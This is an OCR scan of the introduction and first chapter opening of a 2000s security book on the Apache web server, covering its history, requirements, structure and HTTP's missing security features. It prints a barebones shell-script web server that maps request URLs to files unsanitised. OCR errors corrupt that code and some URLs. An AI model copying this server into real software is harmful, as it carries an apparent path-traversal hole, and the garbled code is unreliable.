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Introduction 


Wiikon to Maximum Apache Security. This introduction addresses the following 
topics: 


e Why did I write this book? 
e What this book will tell you 
e System requirements 


e This book’s organization 


Why Did I Write This Book? 


The Maximum Security series, which debuted in 1997, has thus far enjoyed relative 
success. I use the term “relative success,” because security title sales have historically 
trickled, rather than gushed. For altering this and fostering a new market, Sams 
editors deserve kudos. Their insights have proven providential: Today, Maximum 
Security titles sell in five countries, five languages, and on four continents. 
Furthermore, the Maximum Security series inspired many fine similarly oriented 
books from seasoned security professionals here and abroad. 


The Maximum Security series’ success is no mystery. Security has never before been so 
sensitive an issue, nor an issue so vital to business. Many firms have now evolved 
well beyond mere Web presences, and today incorporate sophisticated e-commerce 
functionality into their systems. These developments increased demand for books 
that help administrators shield their enterprises from crackers, and earlier Maximum 
Security titles did—in varying degrees—satisfy that need. 


NOTE — _ - — = =_— = 
Recent events—including the September 11, 2001 tragedy in the U.S.—persuaded even the 
U.S. government to reassess its security posture. Our Homeland Security chief, Tom Ridge, 
recently elicited private sector proposals on GovNet, a new Internet-within-the-Internet that 
will partition sensitive government data from public view. (I'll momentarily stay my opinion 
on GovNet, but you haven’t heard the last of it.) Check out Ridge’s proposal, titled Request for 
Information for a Government Network Designed to Serve Critical Government Functions 
(GOVNET), at http://www. fts.gsa.gov/govnet/govnet.doc. (Note that this link triggers an 
immediate download of a Microsoft Word document.) 





Introduction 


So, the need for up-to-date security titles is now well established, and the Maximum 
Security series was a groundbreaker in this field. That was our good fortune. However, 
we launched our series with a wide scope—a scope too wide, in retrospect. Early 
Maximum Security titles addressed diverse topics, sometimes without providing suffi- 
cient depth on any single topic to make a purchase worthwhile (if you only used 
Mac OS, for example, a general Maximum Security title might have been impractical 
for you). 


We therefore switched our strategy and instead developed books that examined 
particular operating systems or applications in greater depth and specificity. To this 
new development—series title specialization—user response was overwhelmingly 
positive. This was also happy news to Sams (and me), but presented another 
problem: after Maximum Linux Security and Maximum Windows 2000 Security, where 
would we go next? 


Enter Apache Web Server. 


Why Apache Web Server? 


Choosing Apache Web Server was a no-brainer. Apache is as much a fixture in 
ancient Internet lore as Mosaic, Navigator, Linux, and Peter Tattam’s Trumpet 
Winsock (aka tcpman. exe, the first free Windows TCP/IP stack negotiator). To 
belabor that point, l'll take you on a brief ride in the way-back machine. 


The year was 1994. Some highlights from the time: on January 17, Los Angeles 
abruptly awoke to a 6.7 magnitude earthquake that devastated the San Fernando 
Valley. In June, police arrested O.J. Simpson for the murder of his wife and Ronald 
Goldman. Sheryl Crow had a hit song (“All I Wanna Do”), Republicans regained 
control of Congress, and Tom Hanks won an Oscar for Forrest Gump. 


Internet demographics were then impossible to accurately measure (and researchers 
relied strictly on dedicated server statistics), but usage grew quickly. Mosaic’s release 
just one year earlier gave ordinary mortals easy World Wide Web access with a 
convenient graphical user interface, instead of a Unix or VMS CLI. The Net even 
became popular enough to persuade White House staffers that the time had come: 
henceforth, you could surf to ww.whitehouse.gov and find yourself confronted with 
the message “Welcome to the White House.” 


At roughly the same time that O.J. made his notorious Bronco run, Rob McCool was 
wrapping up his tenure at the National Center for Supercomputing Applications at 
the University of Illinois, Urbana-Champaign. McCool, over several years, authored 
and refined NCSA HTTPd, a public-domain server. NCSA HTTPd’s popularity grew 
almost as quickly as its functionality. By mid-1994, it was the world’s most well 
known and most used free Web server. 


Why Did | Write This Book? 


NOTE 


To get NCSA’s server and fiddle with the source code, go to 
http: //hoohoo.ncsa.uiuc.edu/docs/Overview. html. 





McCool’s HTTPd was so popular that independent developers worldwide began 
writing extensions for it. However, the summer of 1994 marked a major change for 
HTTPd and Mr. McCool, who migrated to greener pastures. This left thousands of 
Webmasters without support or a common distribution that incorporated the new 
extensions. 


It was then that the original Apache team (Brian Behlendorf, Roy T. Fielding, Rob 
Hartill, David Robinson, Cliff Skolnick, Randy Terbush, Robert S. Thau, and Andrew 
Wilson) took the initiative and carried forward McCool’s research. (Eric Hagberg, 
Frank Peters, and Nicolas Pioch would later follow.) 


These men—using NCSA HTTPd 1.3 as a baseline—patched known bugs, incorpo- 
rated the aforementioned extensions, and in April 1995 released Apache 0.6.2. That 
was, as of this writing, roughly six years and 100 million Internet users ago. Since 
then, Apache has become Earth’s number one free WWW server. A January 2002 
NetCraft survey clocked Apache as commanding 58.7% of the Web server market. 


NOTE 


The study that placed Microsoft IIS with 30.25% of the market is available at 
http: //www.netcraft.com/survey/. 





Now, here’s a fact: From that day to this, no book ever emerged that focused exclu- 
sively on Apache security. Many fine titles did emerge, however, in varying cate- 
gories, including administration, development, and so on. (The best Apache book in 
any category in my opinion is Ben Laurie’s Apache: The Definitive Guide, from O’Reilly 
and Associates.) For this reason alone, we saw Apache security as an inviting subject. 


More than this, however, many conditions suggested that it was time for Maximum 
Apache Security. 


For example: 


e Apache is one of only two free Web servers that run on so wide a range of 
operating systems, so an Apache security book would benefit many users, not 
merely a limited class. Today, Apache runs on Unix, Windows, Amiga, OS/2, 
and even BeOS. The other Web server in this privileged class is the World Wide 
Web Consortium’s JigSaw, but JigSaw runs in Java (not all shops support Java), 
and also lacks Apache’s history and popularity. Check out JigSaw at 
http: //www.w3.org/Jigsaw/. 
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e Additionally, Apache closely interacts with many CGI and scripting language- 
to-database configurations (for example, PHP to MySQL), and is now the 
preferred choice for pilot projects and proof-of-concept research. No one uses 
Solaris and Oracle to test a speculative enterprise—it’s just too costly a proposi- 
tion. Enterprises engaging in such projects need security, too, and would 
welcome an Apache security title. 


e Apache version 2.0, which is new, includes many security enhancements and 
IPv6 support. A need for hard copy documentation on these changes exists, 
and I aim to fill it. 


e Many open source enthusiasts favor Apache, but often search multiple sources 
to find comprehensive security and development references. Books that address 
these issues—and thus put such information at developers’ fingertips—may 
speed Apache’s development and evolution. 


For these reasons—and because I’m an avid Apache supporter—I agreed to write this 
book. 


What This Book Will Tell You 


This book differs from general Apache administration titles. I wrote it with the 
assumption that you’ve installed Apache at least once on some operating system. 
Maximum Apache Security is, therefore, not a how-to-install Apache book. Rather, it 
focuses on security. 


This doesn’t mean that I flatly abandon configuration issues. Apache often requires 
you to perform actions or set options at compilation or startup that materially affect 
system security. When such issues arise, I cover them. However, I wrote this book 
more to familiarize you with Apache’s security features, how to enable them, and 
how to use them to protect your server. 


As my previous co-authors and I have often reiterated, remote attacks rely on local 
holes, holes that provide remote access or privilege escalation to remote users. A 
cracker can only gain such access if he first exploits a running service. The fewer 
services you run, the less likely that crackers will penetrate your system. This is why 
security folks obsess over what services run, which services are nonessential, and so 
forth. 


Web services remain—for most of us—essential. Perhaps only mail services are more 
common or mission-critical. Crackers thus concentrate on cracking Web servers, 
because they’re there, and they’re often wide open to attack. Tagging—where crackers 
penetrate Web servers and replace their home pages with obnoxious or political 
messages—is now commonplace. Such mishaps arise because Webmasters often fail 
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to properly configure or secure their servers. So, this book does cover configuration 
issues on occasion. 


System Requirements 
This section addresses what hardware, software, and documentation you'll need to 
reap the maximum benefit from this book. I divided these into four sections: 


e Absolute requirements—Things you must have 


e Archiving tools—Tools to unpack source code, archives, and packages that can 
enhance and secure your Apache server 


e Text and typesetting viewers—Tools that will enhance and widen your Apache 
knowledge by enabling you to read relevant online documents 


e Programming languages—Tools to utilize source code, packages, and utilities 
that enhance Apache’s security and functionality 


Absolute Requirements 


To benefit from this book, you'll need the following, at a minimum: 
e An Apache Web Server distribution (1.3 or higher) 
e Unix, Linux, Windows, Amiga, OS/2, or BeOS 
e A dedicated box running one of the aforementioned platforms 


e A network or Ethernet connection 


Your network or Ethernet connection is not a strict requirement (you can use simple 
loopback) but without it, you won’t be able to exploit some of the cross-host or 
attack examples. However, Apache runs on your box as a daemon, and thus enables 
you to simulate many conditions and configurations that would normally exist only 
on the Internet or in intranet environments. Indeed, Apache answers client requests 
from localhost if you precede them with http://127.0.0.1. Thus, even on a single 
machine not connected to a network, Apache provides you with a microcosmic 
version of the WWW, and this, for the most part, should suffice. 


Archiving Tools 


You'll also need wide document and file utility support. This book points you to 
many Net-based resources, and even now, not all Web sites or researchers provide 
documents in a standardized format (though Adobe’s Portable Document Format 
(PDF) seems to be rapidly filling that gap). 
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Also, many utilities, source code, and packages originate from disparate platforms. 
Some are compressed on Unix, some are packaged on Windows, and so forth. 
Therefore, you should have at least the tools mentioned in Table 1.1. 


TABLE I.1 Popular Archive Utilities 


Utility Platform Description and Location 





Winzip Windows Winzip decompresses files compressed to ARC, ARJ, BinHex, gzip, 
LZH, MIME, TAR, Unix compress, and Uuencode archives. Winzip is 
available at http: //www.winzip.com/. 


gunzip Unix gunzip unpacks files compressed with gzip or compress. 
tar Unix tar unpacks tar archives made on Unix systems. 
StuffIt Macintosh StuffIt decompresses ARC, Arj, BinHex, gzip, Macbinary, Stufflt, 


Uuencoded, and ZIP archives. Stufflt is available at 
http://www. aladdinsys.com/expander/index.html. 


Text and Typesetting Viewers 


Many commercial word processors and editors read and write data to proprietary 
formats. Plain text viewers seldom read such formats, which often contain control 
characters, unprintable characters, and sometimes even machine language. Although 
this situation is changing because most text and word processors are now migrating 
to XML, many documents I reference are not backward compatible or don’t open 
cleanly in plain text viewers. Thus, you’ll need one or more readers to examine 
them. 


NOTE 


Readers decode documents written in formats unsupported by your native application set. For 
example, Adobe’s free PDF reader enables you to read PDF documents, and Microsoft’s Word 
Viewer enables users that don’t own Word to read Word-encoded documents. 


Table I.2 lists several such utilities and where they can be found. 


TABLE I.2 Readers for Popular Word Processing Formats 


Reader Description and Location 





Adobe Acrobat Adobe Acrobat Reader decodes Portable Document Format files. Acrobat 
Reader is available for DOS, Windows, Windows 95, Windows NT, Unix, 
Macintosh, and OS/2. Get it here: http://www. adobe.com/supportser - 
vice/custsupport/download.html. 

GSView GSView reads PostScript and GhostScript files. GSView is available for 
OS/2, Windows 3.11, Windows 95, and Windows NT. Get it at 
http: //www.cs.wisc.edu/~ghost/gsview/index.html. 
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TABLE I.2 Continued 





Reader Description and Location 

Word Viewer Word Viewer reads Microsoft Word files. Word Viewer is available for 
Windows (16-bit) and Windows 95/NT. You can get either version at 
http: //office.microsoft.com/downloads/9798/wdvw9716.aspx. 

PowerPoint Viewer PowerPoint Viewer decodes Microsoft PowerPoint presentations. 


PowerPoint Viewer is available at http: //office.microsoft.com/down- 
loads /9798/ppview97.aspx. 





Programming Languages 


Some examples in this book reference source code. Apache supports or interfaces 
with many programming languages. To use the source code in this book, you'll need 
one or more compilers or interpreters. Table I.3 lists these languages and tools. 


TABLE I.3 Compilers and Interpreters 


Tool 


Description and Location 





C and C++ 


Perl 


Java 


JavaScript 


PHP 


Python 


The Free Software Foundation offers freeware C/C++ compilers for both Unix and 
DOS. The Unix version can be downloaded at 

http: //www.gnu.org/software/gcc/gcc.html. The DOS version can be down- 
loaded at http: //ww.delorie.com/djgpp/. Also, any recently released native or 
third-party C/C++ compiler will do, including CygWin, Watcom, Borland, and so on. 
The Practical Extraction and Report Language (Perl) is often used in network 
programming, especially Common Gateway Interface programming. Perl runs on 
Unix, Macintosh, and Windows NT, and is freely available at 

http: //www.perl.com/. 

Java, a Sun Microsystems programming language, is free and available at 
http://java.sun.com/. 

JavaScript is a language embedded in Microsoft Internet Explorer, Netscape 
Navigator, and many other Web clients. To use JavaScript scripts, you should have 
Microsoft Internet Explorer, Netscape Navigator, or Netscape Communicator. These 
are free for noncommercial use, and are available either at 

http: //www.microsft.com or http: //home.netscape.com. 

PHP, the hypertext preprocessor, is a lightweight but powerful in-line scripting 
language that interfaces through Apache to MySQL and other database packages. If 
you don’t already have it, get PHP here: http: //www. php.net. 

Python is an object-oriented scripting language now commonly used in system 
administration and CGI work. It too, interfaces with Apache. Only a few examples in 
this book use Python, but to try these, you'll need a Python interpreter. Get one at 
http: //www.python.org/. 
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TABLE I.3 Continued 


Tool Description and Location 





SQL Structured Query Language is for interacting with databases. SQL is not strictly 
required for this book. However, even a shallow knowledge of SQL might help 
because some examples briefly touch on it. For this, you needn’t obtain any particu- 
lar utility, but rather an introductory primer (book, Web site, and so on) for refer- 
ence purposes. 

VBScript VBScript is a Microsoft scripting language that manipulates Web browser environ- 
ments. VBScript and VBScript documentation are freely available here: 
http://msdn.microsoft.com/scripting/vbscript/default.htm. 





NOTE 


If the comments on programming languages seem intimidating, have no fear. This book will 
explain everything necessary to use the examples herein. As | relate in upcoming sections, you 
needn't be a programmer nor ever write a line of code to use this book. 





This Book’s Organization 


While authoring, editing, or contributing to 19 computer science titles, I had the 
opportunity to make every organizational mistake an author can make—and I did, 
many times over. But mistakes are merely invitations to strive harder, learn more, 
and master one’s craft. In Maximum Apache Security, my hard-earned, hard-knock 
knowledge helped me build what I deem an excellent resource. I hope you'll agree. 


General Organization 


To begin, we’ll take a wide view, examining book, part, chapter, and section struc- 
ture, and cross-referencing. Before we start, though, we'll first address a more funda- 
mental issue: just what type of book did you purchase? 


What Kind of Book Is This? 
Before they pen even a single line, computer authors first establish the type of book 
they’re writing. In the widest sense, they have three choices: 


e The developmental title—Here authors introduce readers to simple concepts 
and as the chapters move on, the subject matter grows progressively more 
advanced. Sams dominates the developmental market with titles that teach you 
anything in 21 days, 24 hours, and so forth. 


e The hard reference title—Here authors scrupulously document a language API 
or other structured standard that periodically changes, and thus requires 
annual updates. Such titles resemble dictionaries or encyclopedias. Users dig 
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them up chiefly when they’ve forgotten what a C declaration, HTML tag, or 
Java class does. These are among the most lucrative titles from a time-invest- 
ment versus financial-return viewpoint, largely because their shelf life is 
indefinite. 


e The textbook—Here authors narrowly focus on a specialized subject (sockets, 
for example). Textbook authors meticulously lecture on conventions, stan- 
dards, and styles that, sadly, few programmers use in practice. Finally, textbook 
authors lay out networking subjects step-by-step, session-by-session, and 
packet-by-packet, until at last their students can develop a full-fledged network 
application—usually with snippets of source code included in their textbook or 
course syllabus. 


Most authors wisely choose just one book type and stick to it, thus reverently 
observing established computer publishing industry standards. I’m a hardheaded 
fellow, though. I go against the grain and try new things. Sometimes, these new 
things work beautifully. Sometimes, they don’t work at all. Maximum Apache Security 
touts my latest approach; one that incorporates subtle advantages that I believe will 
render your experience an enlightening and informative one. 


This book is unique in several ways, but one in particular stands out: Maximum 
Apache Security falls squarely between the classic developmental and reference title 
book types. To demonstrate how this works, I’ll briefly compare the two approaches, 
how they can work in concert, and the benefits you’ll reap from the hybrid you’ve 
purchased. 


Developmental Books and Maximum Apache Security 
Developmental titles progress precisely as their name would suggest: gradually, 
methodically, and in a soup-to-nuts fashion. Figure I.1 illustrates this graphically. 


A Typical Developmental-Oriented Book Structure: Part I 
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Welcome, Author Detailed coverage Installation & Advanced topics, Reference material. 


notes, intro, how to of the OS, system configuration, programming, deep 
use the book, what or technology in options, third party configuration, and 
chapters ahead discussion. RFCs support and aps. administration. 
discuss. abound, etc. 


FIGURE 1.1 How developmental books progress. 
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Developmental titles proceed as if you just purchased the featured system or applica- 
tion and you’re ready to install it for the first time. They then methodically cover 
key issues such as installation, configuration, runtime options, and so forth. 


The developmental technique is an excellent instructional approach, for it follows 
logical and linear paths that most folks follow when studying a subject. Authors 
generally break down such developmental books in parts or sections, and each 
section addresses wide concepts. Authors order such sections or parts in a develop- 
mental way, too, starting with newbie information. Please see Figure I.2. 


ATypical Developmental-Oriented Book Structure: Part Il 


A typical “section” or part 





















































| chapters 1 <= 


Welcome, Author 
notes, intro, how to 
use the book, what 
chapters ahead 
discuss. 


Tells the student 
what she'll learn - 
and how great the 
book is. 


Detailed coverage 
of the OS, system 
or technology in 
discussion. RFCs 
abound, etc. 


Explains the core 
technology under 
discussion. Slightly 
more technical, but 


chapters | chapters chapters Appendices 


Installation & 
configuration, 
options, third-party 
support and aps. 


Advanced topics, Reference material. 
programming, deep 
configuration, and 


administration. 


not intimidating. 





FIGURE I.2 A typical introductory part or section. 


This method, to which Maximum Apache Security fundamentally adheres, works like 
modern novel structure does. You can read a bit—a few paragraphs or even a chapter 
if you like—and put down the book. At some later point, after you’ve mastered what 
you've learned, you can start reading again and learn more. Chapters in such titles 
are standalone and self-contained elements. 


Reference Books, Structure, and Form 

Reference works don’t include much commentary, really. Instead, they focus on hard 
facts, syntax, standards, structures, coding style, and error checking. Because this 
doesn’t require friendly discussion with the reader, such works proceed in a more-or- 
less austere manner, and their authors organize material in the most practical possi- 
ble manner. Generally, this organization is either alphabetical, or is grouped by 
related functions, classes, and so on. Figure I.3 illustrates this structure. 


This Book’s Organization 


The Structure of a Typical Reference-Related Title 
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%{env_variable}e 

The %e Apache LogFormat 
directive will define the specified 
environment variable. See also: 


Generally organized in environment variables. 
alphabetical order. %b 


The %b Apache LogFormat 
Treatment tends to be brief, showing directive records the total 
either basic syntax (without hard number of bytes sent (not 
examples) or flat facts about the including headers). See also: 


specified technology. logging. 














FIGURE I.3 A typical reference title structure. 


As I earlier related, Maximum Apache Security is a hybrid of both approaches. Let’s 
look at how I accomplished that. 


Maximum Apache Security's Developmental Features 


Transparently, this book is a typical developmental title and adheres in every way to 
traditional developmental structure. Figure I.4 illustrates how I diced and sliced it. 
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FIGURE 1.4 Maximum Apache Security’s developmental structure. 
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Nested within this developmental structure, however, I created a more reference- 
oriented title. Maximum Apache Security's cross-referencing, in particular, is tight. Let’s 
cover how it works. 


Maximum Apache Security and Cross-Referencing 
There are two types of cross-references in this book: 


e Internal cross-references—Cross-references that interrelate concepts, data, or 
other important information that lies within these pages 


e External cross-references—Cross-references that interrelate concepts, data, or 
other important information in this book with additional supplemental data 
available elsewhere 


The internal cross-references work like this: 


e All references to Apache source code, unless otherwise noted, relate to version 
2.0. The order of code cross-references is [application or module], [directory], [file- 
name], [function], [line number]. 


e Internal cross-references by subject are ordered in the following manner: /expla- 
nation of what the cross-referenced material is], [chapter, appendix, or glossary], 
[section]. 


External cross-references are formatted as follows: [title], [document or resource type], 
[short description of contents], [credits], [data type], and [locale]. And, to ensure easy 
access to all such external references, a file named references.html on the accompa- 
nying CD-ROM contains links, organized by chapter, appendix, and glossary. 


Part, Chapter, and Section Structure 


When publishers contract you to author a book, they first demand a table of 
contents and book outline. This provides, for editors and authors both, a road map 
of the book’s structure. Typically, this entails each chapter’s name and the issues 
you'll cover in it. Beyond this, editors and publishers leave a book’s organization to 
its author. 


If the author does her job well, editors can quickly and skillfully create a good book. 
Conversely, if the author communicates her thoughts in a consistently disorganized 
manner, even an editor’s best efforts cannot save the book. Unfortunately, economic 
realities lord over the publishing industry (as they do over all industries), and thus 
publishers are sometimes forced to print bad books anyhow. I’ve written a few bad 
ones myself, but this isn’t one of them. 


Parts, chapters, and sections of this book all conform to the pyramid principle 
common to journalism. In each, I begin with an introduction or overview of what’s 
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to come and then work outward, covering the subject in ever-greater detail. Hence, if 
you're searching for the nitty-gritty, find the section that holds the desired informa- 
tion, and thumb to its end. There, you'll find tables containing command-line and 
configuration options, directives, declarations, and so forth. 


About Examples in This Book 


If you’re like me, you buy computer titles for their examples. Often, such examples 
instruct you to execute a command or compile source code. It is by such examples 
and exercises—even more than by attending formal classes—that we learn to admin- 
istrate our systems, achieve competence in various technologies, and write solid 
code. 


Unfortunately, many computer titles contain examples that for one or another 
reason don’t enlighten us, or worse, don’t work properly. 


Some familiar scenarios: 


e Authors sometimes demonstrate a command, but include only its abbreviated 
output. They omit additional output, including unexpected output, errors, and 
so on. Books that omit such data leave you stranded when things go wrong. 
You’re unfamiliar with the unexpected output, and you don’t know how to 
proceed. 


e Authors also sometimes generate examples on custom platforms and configura- 
tions, using custom tools. They might use shared libraries, for example, that 
you haven't yet installed, or those that your operating system doesn’t natively 
support. If authors fail to warn you about these conditions, you might 
encounter unexpected or negative results. 


e Other authors, faced with crucial, impending deadlines, work in haste, and 
sometimes fail to double check that their examples work as intended. Although 
most such authors have excellent technical editors charged with nixing unac- 
ceptable code, such errors can still slip through to printed editions. (This is 
especially so when multiple authors and/or editors work on the same title.) 


e Finally, many authors assume that their readers have experience in advanced 
subjects (such as compilation), and therefore skip details which, when absent, 
can materially affect your project (or even flatly prevent you from achieving 
the desired result). 


Publishers invariably correct these issues by posting errata and patch code on their 
Web sites. However, these corrections emerge weeks or months after the title’s initial 
release. In the interim, readers angrily voice their complaints on Amazon, in news- 
groups, and other public places—and rightly so. Computer titles are expensive, after 
all, and at a minimum their examples should work as promised. 
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Hence, starting with Maximum Linux Security, | took a fastidious approach to exam- 
ples and program output: 


e If an example worked only on exotic configurations, I omitted it. 


e If, when testing a program, utility, or configuration, I found that it behaved 
strangely or in an unintended manner, I omitted it. 


e When documenting examples, I often include exhaustive output. This isn’t to 
seed the book with superfluous filler (and by doing so, raise the page count, 
and therefore the price). Rather, I do it to ensure that what you see herein is 
precisely what you'll see when you implement an example. My aim is to show 
you exactly what to expect. If your output differs from mine, an abnormal 
condition arose. And, more times than not, if you skip ahead a paragraph or 
two beyond the example, I explain possible alternative output and its likely 
reasons. 


This approach guarantees that some examples and their accompanying commentary 
will seem inordinately verbose. However, it also guarantees that this book will give 
you a more holistic understanding of Apache security than most others in its class. 
Indeed, after reading this book, Apache’s errors, output, or behavior will never again 
perplex you. You’ll proceed competently, armed with implacable confidence. 


About Links and References in This Book 


Like all Maximum Security titles, Maximum Apache Security provides many links to 
online resources. I include such resources for practical reasons. 


First, no book can impart everything about a given subject. Rather, books at best 
offer an overview, point you in the proper direction, and give you hands-on experi- 
ence through examples. But in IT—a rapidly evolving field in which you must 
constantly update your skill set—even these generous gifts are insufficient. Today’s 
computer books must do more than merely explain technologies; they must serve as 
springboards that not only inform you but also inspire and enable you to conduct 
further independent research. 


Scholars of antiquity marginally achieved this by including in their works plain text 
bibliographies or suggested reading lists. They left the additional research to you, of 
course, which often entailed you hunting down rare manuscripts at universities on 
interlibrary loan. We’re lucky that the WWW exists today, for it renders this process 
interactive and immediate. 


Also, after you ace installation or configuration of a given operating system or appli- 
cation, you're ready to move on. If the application is extensible, you’ll want to 
extend it; if it needs a patch, you’ll want to patch it; if other tools collaborate with 
it, you’ll want these, too. 
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Finally, today, time is money. Each time that you spend an hour or more searching 
for an online tool, advisory, or article, you lose money (not to mention precious 
minutes of life). In the meantime, you could be doing something else, something 
productive. Maximum Security titles provide innumerable pointers at your fingertips 
and alleviate the need for you to search for anything. This saves you time, money, 
and aggravation. 


So, I always include in my titles long resource lists pertaining to the subject matter. 
Thus, my titles serve not merely as treatises, but also as references and road maps to 
detailed information located elsewhere. 


Some facts about this book’s links: 


e In earlier works, I pointed directly to binary files. When you enter such links in 
your browser, download immediately ensues. This was a mistake, for several 
reasons. First, filenames can change, such as when developers release updates 
and name their files by version number. Second, some sites post errata or other 
information you should read before downloading. Third, some sites request 
(but don’t strictly require) that you register before download. Finally, 
Webmasters frequently rearrange their directory structures, and thus a valid 
binary link today could be invalid tomorrow. So, I provide WWW or FTP links 
that store the resource and offer a link to it (rather than pointing to the file’s 
hard link). 


e The Sams editorial team and I took exhaustive measures to ensure that this 
book’s links were valid at press time. This doesn’t mean that every link will be 
valid, though. The WWW is dynamic, documents move, some Webmasters are 
flaky, and some ISPs fold. Hence, it’s likely that one to three percent of the 
URLs I reference in Maximum Apache Security will be invalid by the time you 
read this. Regrettably, this is beyond our control. For this reason (and to reduce 
further the likelihood of you drowning in 404 errors), I provided at least one 
alternative URL for each link whenever possible. 


e Regarding URLs built of CGI strings: Today, these strings can be incredibly long 
and inconvenient to enter manually. I approached this in two ways. First, if a 
document resided at such a URL, I used the filename to search for an alterna- 
tive location, one with a shorter URL. Whenever possible, I provided the alter- 
native URL instead. In cases where the 130-character CGI-based URL was the 
only source available, I added that URL to the long-urls.html file on the 
accompanying CD-ROM. Thus, when you surf URLs from this book, if you 
encounter an impossibly long one, throw in the CD, pull up the file, and click 
away. 
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e Regarding commercial, shareware, and freeware products I discuss in Maximum 
Apache Security: As in so many of my books, I point to hundreds (or sometimes, 
thousands) of applications, tools, and utilities. I often comment on these, too, 
sometimes praising their functionality and developers. However, I don’t 
endorse or review products, and I’m not affiliated with any of the products 
mentioned herein. Indeed, I don’t own tech stocks, I’m not in venture capital, 
I don’t write for magazines, I don’t receive free products, and thus I have no 
financial interest in any IT product’s success (except this book, of course). If I 
mention a product, I do so because it’s useful or because I generated examples 
with it. Having related that, I do thank vendors and developers that rendered 
technical support on their products. Their help was indispensable. 


Summary 


Maximum Apache Security starts with general security issues common to any server, 
and ends with security issues relevant in hacking your own Apache modules. I hope 
you find it useful. 


PART | 
Getting Started 


IN THIS PART 


1 How Apache Handles Security 





1 IN THIS CHAPTER 


e Generic HTTP Security 


How Apache Handles Considerations 
Security e Apache Security Facilities 


e Apache Extensibility 


e Things Apache Can't Defend 
This chapter summarizes Apache’s security features and Against 


the issues we’ll cover in subsequent chapters. 


Generic HTTP Security Considerations 


To illustrate Apache’s value from a security perspective, I’ll 
briefly cite HTTP’s design. This will show that the compo- 
nents that bare HTTP lacks are the very same components 
the Apache team incorporated in its work. 


In RFC 1945, Tim Berners-Lee, along with R. Fielding and 
H. Frystyk, concisely defined Hypertext Transfer Protocol: 


Hypertext Transfer Protocol (HTTP) is an application-level 
protocol with the lightness and speed necessary for distributed, 
collaborative, hypermedia information systems. It is a generic, 
stateless, object-oriented protocol that can be used for many 
tasks, such as name servers and distributed object manage- 
ment systems, through extension of its request methods 
(commands). A feature of HTTP is the typing of data represen- 
tation, allowing systems to be built independently of the data 


being transferred. 
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The terms application-level, generic, and stateless—along with other terms in RFC 
1945—reveal that taken alone, HTTP lacks vital security features. 


For example: 


e HTTP offers no encryption. Therefore, third parties can capture traffic between 
clients and servers. Sessions thus offer little or no privacy. 


e HTTP is stateless; it doesn’t store information on users and therefore, cannot 
verify a user’s identity. 


e HTTP provides no session authentication. Hence, it cannot determine whether 
an untrusted user hijacked the current session. 


Do these shortcomings represent shoddy work by Berners-Lee? Hardly. Rather, they 
indicate merely that Berners-Lee accomplished his primary objective—to create a 
tool that physicists could use to share data. He left specific security considerations to 
developers that later implemented HTTP in their applications. 


Indeed, a Web server’s baseline function is solely this: to listen for and satisfy 
requests from remote Web clients for files or directories. Any application that 
performs this task (and in the balance, adheres to HTTP’s standard) is a Web server— 
even if it offers little or no security facilities. 


Nothing illustrates this better than tools like SH-HTTP, a Web server written in ash by 
grendel@vip.net.pl in Poland: 


#!/bin/ash 

VERSION=0. 1 

NAME="ShellHTTPD" 
DEFCONTENT="text/htm1" 
DOCROOT=/usr/local/var/sh-www 
DEFINDEX=index. html 
LOGFILE=/usr/local/var/log/sh-httpd.1log 


log() { 
local REMOTE_HOST=$1 
local REFERRER=$2 
local CODE=$3 
local SIZE=$4 


echo "$REMOTE_HOST $REFERRER - [$REQ_DATE] 
= \ "${REQUEST}\" ${CODE} ${SIZE}" >> ${LOGFILE} 


} 
print_header() { 


} 


echo -e "HTTP/1.0 200 OK\r" 
echo -e "Server: ${NAME}/${VERSION}\r" 
echo -e “Date: `date`\r" 


print_error() { 


} 


echo -e "HTTP/1.0 $1 $2\r" 

echo -e "Content-type: $DEFCONTENT\r" 
echo -e "Connection: close\r" 

echo -e “Date: ‘date*\r" 

echo -e "\r" 

echo -e "$2\r" 

exit 1 


guess content_type() { 


local FILE=$1 

local CONTENT 

case ${FILE##*.} in 

html) CONTENT=$DEFCONTENT ;; 

gz) CONTENT=application/x-gzip ;; 

*) CONTENT=application/octet-stream ;; 
esac 


echo -e "Content-type: $CONTENT" 


} 

do_get() { 
local DIR 
local NURL 
local LEN 


if [ ! -d $DOCROOT ]; then 
log ${PEER} - 404 0 
print_error 404 "No such file or directory" 
fi 

if [ -z "${URL##*/}" ]; then 
URL=${URL}${DEF INDEX} 
fi 
DIR="`dirname $URL`" 
if [ ! -d ${DOCROOT}/${DIR} ]; then 
log ${PEER} - 404 0 
print_error 404 "Directory not found" 
else 
cd ${DOCROOT}/${DIR} 
NURL="*pwd*/*basename ${URL} " 
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} 


URL=${NURL} 

fi 

if [ ! -f ${URL} ]; then 

log ${PEER} - 404 0 

print_error 404 "Document not found" 
fi 

print_header 

guess_content_type ${URL} 

LEN="`ls -1 ${URL} | tr -s '' | cut -d'' -f 5°" 
echo -e "Content-length: $LEN\r\n\r" 
log ${PEER} - 200 ${LEN} 

cat ${URL} 

sleep 3 


read_request() { 


} 
# 


local DIRT 

local COMMAND 

read REQUEST 

read DIRT 

REQ_DATE="“date +"%d/%b/%Y :%H:%Ml:%S %z"`" 
REQUEST="*echo ${REQUEST} | tr -s [:blank:]°" 


COMMAND=""*echo ${REQUEST} | cut -d ' ' -f 1°" 
URL="*echo ${REQUEST} | cut -d ' ' -f 2°" 
PROTOCOL=""echo ${REQUEST} | cut -d ' ' -f 3°" 


case $COMMAND in 

HEAD) print_error 501 "Not implemented (yet)" ;; 
GET) do get ;; 

*) print_error 501 "Not Implemented" ;; 

esac 


# It was supposed to be clean - without any 

# non-standard utilities but I want some 

# logging where the connections come from, so 

# I use just this one utility to get the peer address 
PEER="‘getpeername | cut -d ' ' -f 1°" 

read_request 

exit 0 
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Such barebones Web servers—written in many languages—conform, in varying 
degrees, to the HTTP standard. Some exotic ones include the following: 


e Apprentice by Dmitry Ovsyanko, written in Perl, is available at 
http: //www.halyava.ru/do/apprentice.htm. 


e AWKhttpd by Valentin Hilbig, written in awk, is available at 
http: //awk.geht.net:81/README.html1. 


e PS-HTTPD by Anders Karlsson, written in PostScript (yes, PostScript), is available 
at http://www. pugo.org:8080/. 


e SED-HTTPD, by Matthew Parry, written in sed, is available at 
http://awk.geht.net:81/contrib/sedhttpd/sedhttpd0.2.txt. 


These eclectic tools seldom offer advanced security features, but instead emulate, 
embody, or advance the original concept of a Web server proper: They wait for and 
satisfy remote client requests. 


The degree of security your Web server offers, therefore, depends largely on its devel- 
opment team’s efforts. Along these lines, you’re in luck. The Apache team has 
proven experience in network security, and has skillfully applied that experience to 
produce an excellent product. Today, Apache Web Server has more security facilities 
pound-for-pound than any other server in its class. 


NOTE 
